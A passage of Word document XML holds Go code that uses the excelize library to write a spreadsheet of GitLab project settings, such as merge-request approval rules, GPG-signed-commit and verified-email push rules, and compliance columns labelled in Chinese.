    <w:p w14:paraId="40FFC1B0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用或禁用合并队列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB660AB" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推送规则：未</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>签名的提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A750E5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推送规则：拒绝未验证邮箱的用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED733B1" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推送规则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作者和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>者需要是经过邮箱验证的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitlab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E6C041" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"xxx",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6A44DE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"xxxxx",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE0EEE2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"xxxx",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02394639" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"xxxx",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A479E52" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589190AC" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63680201" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2821D34E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>name, err = excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B4233D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB8B512" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3207728B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C213D6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_Project, name, &amp;title)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7FF4AC" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DA54F6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FA191D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A24CC6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D67F63C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585E3F60" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>name, err = excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B22F13" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C4C6A3" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30055A25" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58600BE4" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_Project, name, &amp;title)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B50A7C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77601D05" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D465143" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA84856" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BEBF2A5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>var MR_flag_start, MR_flag_end, PR_flag_start, PR_flag_end, DBP_flag_start, DBP_flag_end string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C870E5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659FC992" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际是两行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E04D1B6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for i, v := range title {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EE0DA1" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阻止发起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的人审批</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8DC384" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>MR_flag_start = toChar(i) + "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05925342" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5990B635" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时若有新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，是否撤销批准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB080A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>MR_flag_end = toChar(i) + "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6039FA" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299D1D90" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推送规则：未</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>签名的提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B83ECF7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>PR_flag_start = toChar(i) + "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F26766D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619A245D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推送规则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作者和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>者需要是经过邮箱验证的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitlab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7171EBC8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>PR_flag_end = toChar(i) + "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6F5C5B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D36DCE8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合规性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC5A5EC" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DBP_flag_start = toChar(i) + "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657B08F4" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1357A6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不合规描述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D16616E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DBP_flag_end = toChar(i) + "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA4A8E7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF08DFE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50842EA7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阻止发起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的人审批</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" || v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阻止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的人审批</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" || v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阻止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中可以编辑审批规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" || v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>批准时需要密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" || v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时若有新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，是否撤销批准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FE8D4A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357F3ACE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
